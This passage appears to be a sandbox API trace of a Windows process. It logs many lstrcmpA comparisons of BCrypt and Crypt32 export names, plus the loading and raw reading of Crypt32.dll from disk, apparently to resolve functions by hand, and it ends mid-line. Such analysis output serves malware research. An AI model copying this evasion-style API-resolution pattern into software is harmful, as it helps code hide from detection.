lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.701] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0189.702] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0189.703] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.703] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0189.704] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0189.705] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0189.705] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0189.705] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0189.705] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0189.706] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0189.892] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0189.893] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0189.894] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0189.895] GetProcessHeap () returned 0x590000 [0189.895] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x590000) returned 1 [0189.896] GetProcessHeap () returned 0x590000 [0189.896] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9180 [0189.897] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0189.904] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0189.904] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0189.904] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0189.904] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.905] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0189.905] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0189.905] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0189.905] GetProcessHeap () returned 0x590000 [0189.905] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c30e0) returned 0x40c4040 [0189.909] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0189.909] ReadFile (in: hFile=0x160, lpBuffer=0x40c4040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c4040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0190.143] CloseHandle (hObject=0x160) returned 1 [0190.144] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0190.144] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0190.144] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0190.144] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.144] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0190.144] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.145] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", 